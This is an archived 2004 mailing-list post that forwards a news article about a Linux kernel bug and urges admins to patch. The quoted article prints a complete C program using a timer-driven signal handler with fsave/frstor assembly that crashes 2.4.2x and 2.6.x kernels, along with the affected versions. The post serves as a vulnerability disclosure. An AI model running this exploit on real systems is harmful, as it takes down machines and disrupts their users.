----- Original Message ----- From: "Anand Kumar Saha" anand.kumar@gavsin.com To: ilugc@ae.iitm.ac.in Sent: Thursday, June 17, 2004 2:25 PM Subject: [Ilugc] [IMP] C code that crashes linux kernel!
hi group,
don't know why this new didn't make much noise. a small C code, which when compiled and run crashes the kernel. i tried to copile and run this over ssh, and it crashed my ssh session as well as the ssh server.
admins make sure you apply the proper patches.
http://reviewed.homelinux.org/news/2004-06-11_kernel_crash/index.html.en
<FROM THE WEBSITE>
New Kernel Crash-Exploit discovered Published 2004-06-11 by xiando, v2.3.0, last updated 2004-06-15.
A bug lets a simple C program crash the Linux kernel, effectively locking the whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture.
The kernel is the most important part of the Linux operating system. It handles communication with the computers hardware and decides the priority of running programs (processes). If the kernels stops doing it's job, everything else will too.
The Evil Code Running this simple C program crashes the Linux kernel.
crash.c.txt
#include <sys/time.h> #include <signal.h> #include <unistd.h>
static void Handler(int ignore) { char fpubuf[108]; __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf)); write(2, "*", 1); __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf)); }
int main(int argc, char *argv[]) { struct itimerval spec; signal(SIGALRM, Handler); spec.it_interval.tv_sec=0; spec.it_interval.tv_usec=100; spec.it_value.tv_sec=0; spec.it_value.tv_usec=100; setitimer(ITIMER_REAL, &spec, NULL); while(1) write(1, ".", 1);
return 0; }
This bug is confirmed to be present when the code is compiled with GCC version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel versions 2.4.2x and 2.6.x on x86 and amd64 systems.
[ .. SNIP .. ]
</FROM THE WEBSITE>
saha -- Rohit Baisakhiya PH-9869265724 http://linux.kiraninfotech.com
-
Rohit Baisakhiya